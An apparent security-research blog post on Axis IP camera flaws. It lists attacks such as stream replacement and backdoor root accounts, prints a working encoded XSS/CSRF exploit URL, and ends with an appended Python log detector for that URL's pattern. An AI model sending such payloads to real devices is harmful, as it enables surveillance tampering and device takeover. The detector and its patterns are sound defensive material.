Owning Big Brother - Hollywood-style Exploits Included!
I've done some research on Axis IP cameras, which I am now able to disclose and reveal some of the magic behind. Although this is not independent research, I am mentioning it here as it may interest some readers.
The research is made of two components: a purple paper (one of the traditions we follow in GNUCITIZEN) and a video. I promise you that I won't bore you with PoCs, but actual Hollywood-style exploits. This includes the classic attack in which the legitimate video stream gets replaced by another stream that keeps looping forever (remember Speed). We even created a demo video of this attack! Blame Major Malfunction (soon to be featured) for this, as he suggested the third-party-video infinite loop technique.
Here are some of the juicy bits, mentioned in the paper:
- Cross-browser XSS phishing
- Replacing the legitimate video stream with our own
- Adding a Backdoor Root Account
- Stealing the 'passwd' File
Here is an example of an exploit that we've come up with. You don't know what it is doing? Well, read the paper for more details:
http://target/%3cscript%20src=%22/this_server/ServerManager.srv%3fconf_Layout_TitleEnabled=yes&Layout_TitleEnabled=on&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3cimg%20src=http://snipu.com/f1%3e%3c!-- &servermanager_do=set_variables%22%3e%3c/script%3e%3c!--AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
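The exploit URL above has a recognisable shape once it is URL-decoded: an injected script tag, an image tag smuggled into a configuration value, and an HTML comment followed by a long run of filler characters. The following detector is an added example written for this post (it is not code from the GNUCITIZEN paper or from Axis); it decodes request paths from combined-format web server log lines and flags those patterns. The log lines are constructed for the example, and the indicator regexes are heuristics, not a complete ruleset.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not taken from the
# original post. The third request mirrors the shape of the encoded URL quoted
# above, with the image host replaced by a placeholder.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /view/index.shtml HTTP/1.1" 200 1024
192.0.2.11 - - [01/Jan/2008:10:00:05 +0000] "GET /axis-cgi/jpg/image.cgi?resolution=640x480 HTTP/1.1" 200 52314
198.51.100.7 - - [01/Jan/2008:10:00:09 +0000] "GET /%3cscript%20src=%22/this_server/ServerManager.srv%3fconf_Layout_OwnTitle=%3cimg%20src=http://example.com/x%3e%22%3e%3c/script%3e%3c!--AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 512
"""

# Minimal combined-log-format parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Each indicator is checked against the fully decoded path, so percent-encoded
# (or double-encoded) tags cannot slip past a plain substring match.
INDICATORS = [
    ("script_tag", re.compile(r"<\s*script", re.I)),
    ("img_tag", re.compile(r"<\s*img", re.I)),
    # An HTML comment opener followed by a run of 16+ identical characters: the
    # padding trick used to swallow the rest of the page after the injection.
    ("comment_padding", re.compile(r"<!--.*?(.)\1{15,}")),
    ("html_comment_open", re.compile(r"<!--")),
]


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly until the string stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_indicators(raw_path):
    """Return the names of all indicators that match the decoded request path."""
    decoded = fully_decode(raw_path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan_log(text):
    """Parse each log line and collect requests with at least one indicator."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        indicators = find_indicators(match.group("path"))
        if indicators:
            hits.append({
                "ip": match.group("ip"),
                "status": int(match.group("status")),
                "path": match.group("path"),
                "indicators": indicators,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ", ".join(hit["indicators"]))
```

Run against the embedded sample, the two ordinary camera requests pass cleanly and only the third request is reported, with the script tag, image tag and comment-padding indicators all set. In practice the same decode-then-match step belongs in front of any CGI that writes configuration values, so that markup never reaches a page title in the first place.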